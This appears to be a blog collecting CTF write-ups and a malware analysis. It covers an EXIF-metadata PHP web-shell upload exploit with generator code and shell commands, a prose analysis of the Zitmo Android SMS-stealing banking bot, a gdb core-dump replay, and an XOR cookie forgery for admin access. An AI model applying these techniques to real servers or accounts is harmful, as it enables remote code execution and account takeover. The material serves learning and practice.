ForbiddenBITS CTF 2013 Write Up : Web 600 Imafreak

Imafreak

In order to practice for wargame, I choose this problem from ForbiddenBITS CTF 2013 and reconstruct this environment. Also some environments are different, the solution are identical. 

Problem Description 

In this problem, the website is provided. There are two pages in this website, an view.php and upload.php.

Take a briefly view of upload.php, this page contains a form to upload image file. With no any parameters,  view.php only show "wrong id" string. There is also a hint "Hint6[Freak]:~)".

Solution

Firstly, Following the hint, we can access view.php~ and view the cource code. Source code can be found here.
The following piece code is vulnerable.

$_GET['id']=str_replace(".","",$_GET['id']);       
$_GET['id']=str_replace("/","",$_GET['id']);
$_GET['id']=str_replace("\\","",$_GET['id']);
if(!empty($_GET['id']) && @file_exists('upload/'.$_GET['id'].'.jpg')){
    $img=file_get_contents('upload/'.$_GET['id'].'.jpg');
    $notFound="";
    $exif_ifd0 = read_exif_data('upload/'.$_GET['id'].'.jpg','IFD0' ,0);
    if (@array_key_exists('Model', $exif_ifd0)) {
        $camModel = $exif_ifd0['Model'];
    } else { $camModel = $notFound; }
        $imgx = 'upload/'.$_GET['id'].'.jpg';
        $imgHand = ImageCreateFromJPEG($imgx);
        $imgSize = GetImageSize($imgx);
        $imgWidth = $imgSize[0];
        $imgHeight = $imgSize[1];
 
        $dd="";
        for ($l = 0; $l < $imgHeight; $l++) {
            for ($c = 0; $c < $imgWidth; $c++) {
                $pxlCor = ImageColorAt($imgHand,$c,$l);
                $pxlCorArr = ImageColorsForIndex($imgHand, $pxlCor);
                $dd.=chr($pxlCorArr["red"]);
            }
        }
        $filex="secretstoreddata/"."secret".($camModel);
        $fp=fopen($filex, 'w');
        fwrite($fp, $dd);
        fclose($fp);
}                                

Therefore we can observe that this php read the image in upload directory and save the red part into secretstoreddata directory. If we can control the content and file extension, then we can inject some code and execute arbitrary code.

We start from file extension, the file extension comes from read_exif_data().  Function read_exif_data() return  EXIF headers from a JPEG file, which is used to maintain some metadata of digital camera.Since EXIF data can be modified, we can modify it and control file extension by exiv2.

File content can be construct by some image library such as python's PIL and php's Image Processing and Generation. Here we following the program in this write up as following.

';
$width = strlen($shell);
// create image using true color
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get ascii value of shellcode
    $value = ord($shell[$x]);
    // set a pixel using the ascii
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}
// save image using 100% quality
imagejpeg($img, 'imafreak.jpg', 100);
// add Model metadata using exiv2 tool
system('src/exiv2 -M "add Exif.Image.Model .php" imafreak.jpg');
?>                      

After executing this php program, the jpeg file will be generated. Then we access to

http://140.113.216.151:10180/Imafreak/view.php?id=imafreak

Then we send the request to generated php program as follow.

http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=ls

We can find that there is key.php file in secretstoreddata dir. So we continue to read this file and finally get the key.

http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=cat%20key.php

 

note

In July 16 2013, a technique blog talk about a malware which emplaoy similar technique.
http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html 

Android Malware Zitmo Analysis

Zitmo

Zitmo is an android bot which aim to stole user's bank authentication tokens. It is interest that Zitmo's feature to beat two factor authentication. 

In order to prevent traditional banking trojan, online banking service employ transaction authentication numbers (TAN), which is a two factor authentication mechanism, to authorize user.  

Zitmo is the mobile version of Zeus bot, which give Zeus a chance to defeat two-factor authentication.

In two factor authentication, online bank will first request user's mobile number. After user first authentication with tradition password mechanism, the message contains secondary password will send to user's mobile. Only user with this two password can successful authentication and complete transaction.

Following figure describe how Zitmo work:

First, Zeus will infect user's computer. Once user connects to online back after infection, the connection will be hijacked. All the user's input will be sent to bot server including the phone number used to authenticate. Then the bot server will send a forge message to user's mobile to install an app, which is indeed Zitmo bot. Once user install this app, all the message will be hijacked too. Hence the secondary password will sent to bot server, thus attacker has ability to do some bank transaction.

Take a briefly look into Zitmo.

In manifest, we can observe following sections.

Zitmo requests permission to reseive and send message.

Zitmo also register a receiver triggered once mobile boot/reboot.

We can observe Zitmo register a receiver to intercept message with high priority(MAX INTEGER), so it can hijack user's incoming messages. 

The core part of Zitmo is in following figure. After massage coming, function onReceive() will called and snedSmsIfEnabled() will called to send Sms to attacker. 

Reference

http://www.securelist.com/en/analysis/204792194/

DEFCON 21 CTF Write Up：gnireengine 1

gnireengine 1：policebox

In this problem, we got two files, one executable named policebox and a core dump file of policebox.
As we observe the core dump, we found that this core dump file is generated when few instructions after main function. While we need to get some information of getchar(), it seem no clue to continue.
Then we use readelf to check what is inside the core file.

We noticed the section named precord exists, which indicate the core dump contain a program execution record logged by gdb's Process Record feature.

Therefore we first replay this record with gdb, and disassemble the program. Function getchar() is located at 0x08048690, where we can set the break point latter.

 After setting break point, we continue the replay. Then program will halt in getchar() and we can print value of eax, which is the user's input.

Collecting all the input value, the key will showed.

The key is : w0rlds.w0rst.k3yl0gger! 

reference

http://team-alternatives.blogspot.kr/2013/06/defcon-21-ctf-quals-policebox-writeup.html

http://sourceware.org/gdb/wiki/ProcessRecord

DEFCON 21 CTF Writeup：3dub 1

3dub 1：badmedicine

In this problem, we only see a login form.

After we login with some username. We get the login successful page.

But it show that "the key is only for the admin"

And if we try to login with admin. The message "admin login disabled" showed.

Then we return to login by other account and observe the behavior of web page by tamper data.

With tamper data, we observe the cookie "username" was set.

After try to login with different username

admin1 : 09c8259ca01f

admiN  : 09c8259c80

We can find that most part of cookie are the same and only differ lightly.

Therefore we can guess that cookies are encrypt by xor operator.

Finally we can find the cookie of admin

admin : 09c8259ca0

Then we change the value of cookie and resend the page to get the key.

reference

there are some write up about this problem.

http://forum4hackers.blogspot.tw/2013/06/defcon-2013-3dub-1-2-and-4-web-writeup.html

http://blogs.univ-poitiers.fr/e-laize/2013/06/17/dc21_3dub_1/

https://cesena.ing2.unibo.it/2013/06/17/def-con-2013-badmedicine-3dub-2/

http://scoding.de/defcon-ctf-2013-writeup-3dub-1/

http://nullify-ctf.blogspot.tw/2013/06/3dub-1-def-con-quals-2013-writeup.html